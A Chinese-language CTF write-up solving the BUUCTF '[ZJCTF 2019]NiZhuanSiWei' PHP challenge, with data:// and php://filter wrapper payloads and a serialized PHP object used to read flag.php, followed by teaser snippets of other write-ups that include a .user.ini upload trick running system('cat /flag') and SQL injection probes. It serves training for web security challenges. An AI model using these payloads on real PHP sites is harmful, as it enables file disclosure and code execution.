Buuctf-web-[ZJCTF 2019]NiZhuanSiWei

阿新 • • 發佈：2020-10-16

進入之後

然後我們看到了一個if

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

要求text不為空,並且file_get_contents($text,'r')==="welcome to the zjctf",從檔案裡讀取字串，還要和welcome to the zjctf相等。

data:// 寫入協議

於是構造第一個payload：

?text=data://text/plain,welcome to the zjctf

　　

然後我們看到第二個if後面包含著一個unless.php。那我們直接訪問它，然後將裡面的資料給讀取出來

構造payload：

?text=data:text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

　　

發現了一串base64，解碼

<?php  

class Flag{  //flag.php （題目原始碼註釋） 
    public $file;    
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file);    //輸出檔案內容,通過這個函式讀取flag
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

　　

最後我們需要反序列化password：，然後線上工具跑

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

　　

最終的payload為

?text=data:text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

　　

檢視原始碼直接flag

Buuctf-web-[ZJCTF 2019]NiZhuanSiWei

進入之後然後我們看到了一個if if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\"))

[ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei 題目 php程式碼審計題 <?php $text = $_GET["text"]; $file = $_GET["file"];

Buuctf-web-[SUCTF 2019]CheckIn

首先新增上傳一個.user.ini GIF89a auto_prepend_file=a.jpg 再新增上傳一個a.jpg GIF89a <script language=\'php\'>system(\'cat /flag\')</script>

[ZJCTF 2019]NiZhuanSiWei 1

一前置知識點 file_get_contents函式 — 將整個檔案讀入一個字串 ctf中偽協議總結

BUUCTF之[EIS 2019]EzPOP&BUUCTF[2020 新春紅包題]1 web

BUUCTF之[EIS 2019]EzPOP&BUUCTF[2020 新春紅包題]1 web 兩題是差不多的，只是一個函式稍微修改了，其中一個字尾不能為php，只要通過路徑穿越：filename=\'/../pz.php/.\';

buuctf-web [強網杯 2019]隨便注 1

啟動靶機，開啟是這個介面首先輸入1‘，它會報錯然後輸入1\' order by 2，這說明只有兩個欄位。

Buuctf-web-[極客大挑戰 2019]HardSQL

被堵異或運算子為^ 或者 xor兩個同為真的條件做異或，結果為假，兩個同為假的條件做異或，結果為假，一個條件為真，一個條件為假，結果為真，null與任何條件（真、假、null）做異或，結果都為null

[BUUCTF][Web][極客大挑戰 2019]Secret File 1

開啟靶機對應的url 右鍵檢視網頁原始碼，檢視到一個訪問路徑 /Archive_room.php 構造url訪問一下

[BUUCTF][Web][極客大挑戰 2019]LoveSQL 1

開啟靶機url，頁面顯示有兩個輸入框，框中輸入123\',發現兩個框都有sql注入問題

[BUUCTF][WEB][極客大挑戰 2019]Http 1

開啟靶機提供的url 右鍵檢視網頁原始碼發現一個連結 (Secret.php)，訪問看看返回：

BuuCTF Web Writeup

WarmUp index.php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">

BuuCTF Web Writeup 第三部分

[GKCTF2020]cve版簽到題目提示 cve-2020-7066 Hint: Flag in localhost Tips: Host must be end with \'123\'

buuctf-web Http 1

啟動靶機，開啟環境開啟之後是這個介面，三個不同的，還蠻有意思的，然後看這個介面我也看不也啥來，所以只能，檢視一手原始碼了。

buuctf-web Easy MD5 1

啟動靶機看樣子或許又是存在注入。試了半天沒啥反應，那我就先用bp抓包吧

buuctf-web Hack World 1

我們開啟環境後發現這還是一道sql注入題我首先隨便試了一下，先輸入了0 顯示Error Occured When Fetch Result.

buuctf-web HardSQL 1

這或許就是sql最終章了吧開啟頁面。還是這種介面，只不過是加強了一下。哈哈哈。

Buuctf-web-[CISCN2019 華北賽區 Day2 Web1]Hack World

輸入1/1結果回顯了Hello, glzjin wants a girlfriend. 於是我們判斷它是數字型注入試了半天發現他過濾了 or union and ，但好像沒有過濾（）

BUUCTF：[SUCTF 2019]Pythonginx

技術標籤：CTF_Web_Writeup 題目提示了，是ngix，所以我們要知道nginx一些檔案存放的地方

BUUCTF - Web - BabySQli

BabySQli 拿到一個登入框隨便填些資訊登入一下這裡使用者名稱不是admin的話會提示使用者名稱錯誤，其他都提示密碼錯誤，看來admin就是正確使用者名稱

buuctf re [GWCTF 2019]xxor

__int64 __fastcall main(int a1, char **a2, char **a3) { int i; // [rsp+8h] [rbp-68h] int j; // [rsp+Ch] [rbp-64h]